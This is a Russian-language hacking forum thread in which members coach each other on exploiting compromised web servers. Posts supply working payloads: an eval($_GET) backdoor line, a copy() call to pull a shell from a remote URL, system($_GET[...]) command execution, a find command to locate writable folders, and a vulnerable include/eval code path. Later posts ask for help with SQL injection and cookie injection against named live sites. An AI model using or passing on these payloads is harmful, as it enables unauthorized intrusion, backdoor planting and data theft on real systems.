Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. VertuOzz

    VertuOzz New Member

    Joined:
    8 Sep 2011
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Передавал, phpinfo отображается, а дальше чего?
     
  2. Faaax

    Faaax Banned

    Joined:
    30 Aug 2010
    Messages:
    428
    Likes Received:
    48
    Reputations:
    11
    код выполняй!
    попробуй этот
    Code:
    eval(stripslashes($_GET[e]));
     
  3. VertuOzz

    VertuOzz New Member

    Joined:
    8 Sep 2011
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Извиняюсь за нубский вопрос, а что это даст?
     
  4. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,444
    Likes Received:
    762
    Reputations:
    834
    это может дать тебе возможность выполнять пхп код, т.е если в том месте где ты вставил эту строчку срабодает пхп инфо которое можешь вызвать так "e=phpinfo();" то значит можешь удаленно попробовать залить шелл примерно так "e=cp("/folder/shell.php","http://localhost/shell.txt");" ну или на месте самой этой строчки вставить код уплодера, вообщем вариантов куча)
     
    _________________________
  5. VertuOzz

    VertuOzz New Member

    Joined:
    8 Sep 2011
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    А можно через cmd залить?
    На команду
    Code:
    find . -type d -perm 777 -print
    ругнулся
    HTML:
    <b>Warning</b>:  include_once() [<a href='function.include'>function.include</a>]: Failed opening 'modules/error_reporting(0);print `find . -type d -perm 777 -print`;///error_reporting(0);print `find . -type d -perm 777 -print`;//.php' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in <b>/home/xxx/public_html/includes/libs/ss.inc.php</b> on line <b>168</b><br />
    но выдал все папки с правами на записью Какой командой можно залить файл, удаленно или локально?
     
  6. sourcec0de

    sourcec0de Banned

    Joined:
    13 Jun 2011
    Messages:
    35
    Likes Received:
    12
    Reputations:
    7
    Херню не неси
     
  7. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,444
    Likes Received:
    762
    Reputations:
    834
    Есле херня, аргументируй!!! в чем имено,
    cp - это функция копирования, линукса, онаже COPY на пхп, а как вы ее будите использовать это уже другой вопрос, требую аргументировать в чем херня!
     
    _________________________
  8. sourcec0de

    sourcec0de Banned

    Joined:
    13 Jun 2011
    Messages:
    35
    Likes Received:
    12
    Reputations:
    7
    [​IMG]
    Сначала пишешь вставить эвал, а потом юзаешь системные команды(непосресдтвенно через эвал), да еще и с неправильными аргументами...
     
  9. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,444
    Likes Received:
    762
    Reputations:
    834
    если есть возможность, посмотри какие качалки есть, может WGET есть, ей и попробуй если через пхп то copy("куда", "откуда");, если локально то "cp <ЧТО> <КУДА>"
     
    _________________________
  10. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    1,076
    Likes Received:
    527
    Reputations:
    204
    system \ passthru \ etc => system("cp <ЧТО> <КУДА>");
    Но никак не просто в eval въебать cp.
    Может все-таки не будешь пугать людей?
     
    1 person likes this.
  11. sourcec0de

    sourcec0de Banned

    Joined:
    13 Jun 2011
    Messages:
    35
    Likes Received:
    12
    Reputations:
    7
    И опять бред, ты я смотрю главный распространитель дезинформации тут.
     
    1 person likes this.
  12. randman

    randman Members of Antichat

    Joined:
    15 May 2010
    Messages:
    1,369
    Likes Received:
    605
    Reputations:
    1,101
    Это LFI, и произвольное выполнение кода(Не команд).

    P.S. Писать не хотел, так как это элементарно, но winstrool попросил разобраться.
     
    #17852 randman, 14 Sep 2011
    Last edited: 15 Sep 2011
    1 person likes this.
  13. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    1,076
    Likes Received:
    527
    Reputations:
    204
    Это и произвольное выполнение кода и LFI. Но мне кажется, что "произвольное выполнение кода" как-то выгоднее нежели LFI, да и говорим мы не о LFI сейчас.
    https://forum.antichat.ru/showpost.php?p=2829300&postcount=18023
    PHP:
    $app $_POST['attachment'];
    ...
    include_once(
    'modules/'.$app.'/'.$app.'.php');
    ...
    $c_run $app.'::ajax_post();';
    ...
    eval(
    $c_run); //EVAL!!1111 Code Execution
    Писать не хотел, так как это элементарно, но Расмус Лердорф попросил разобраться.
     
    #17853 Tigger, 14 Sep 2011
    Last edited: 14 Sep 2011
    2 people like this.
  14. MyGreenLife

    MyGreenLife Member

    Joined:
    27 Nov 2009
    Messages:
    16
    Likes Received:
    9
    Reputations:
    6
    Подскажите пожалуйста, залил бекдор через into+dumpfile, но никак немогу найти доступные на запись папки, создал пхп инфо командой php?commanda=phpinfo();
    Можно проинклудить. Но вот мб есть какая команда для просмотра врайтбл папок?

    Где то в этом разделе увидел такую конструкцию : php?commanda=ls -la но что неработает =)
    Спасибо ...
     
  15. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,070
    Likes Received:
    529
    Reputations:
    935
    php?commanda=system($_GET[console]);&console=ls -la
     
    _________________________
  16. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    1,076
    Likes Received:
    527
    Reputations:
    204
    Боюсь спрашивать, но рискну:
    Как ты залил бэкдор через into+dumpfile, если не нашел директории доступной на запись? /tmp + include? Это во-первых.
    Во-вторых, ты, судя по всему, залил бэкдор с eval а ls -la это системная команда. Смотри вывод phpinfo(); смотри что прописано в директиве disabled_function, если там нету отключенных system \ passthru \ etc то используются соответсвенно не отчключенную команду: php?commanda=system('id; ls -la');
     
  17. Faaax

    Faaax Banned

    Joined:
    30 Aug 2010
    Messages:
    428
    Likes Received:
    48
    Reputations:
    11
    полностью с тобой согласен!
    некоторые много говорят не поделу!
     
  18. MyGreenLife

    MyGreenLife Member

    Joined:
    27 Nov 2009
    Messages:
    16
    Likes Received:
    9
    Reputations:
    6
    Я просто хотел узнать как можно найти доступные папки для записи, ибо бекдор можно залить и если нету прав на запись в диру. Например через модуль булки. За совет спасибо.

    Спасибо.
     
  19. Osstudio

    Osstudio Banned

    Joined:
    17 Apr 2011
    Messages:
    695
    Likes Received:
    161
    Reputations:
    81
    Помогите со скулью:
    http://nora-m.ru/index/2/product/220+order+by+1--
    ;)
     
  20. alerondel

    alerondel Member

    Joined:
    20 Apr 2011
    Messages:
    169
    Likes Received:
    9
    Reputations:
    6
    _http://wow.net.kg/^object=201388 нашел Cookie иньекцию,ввожу данные в Havij пишет что Target is vulnerable,уязвима,но..
    Bypassing illegal union failed! Turning off this feature

    Как решить ?
     
Loading...
Thread Status:
Not open for further replies.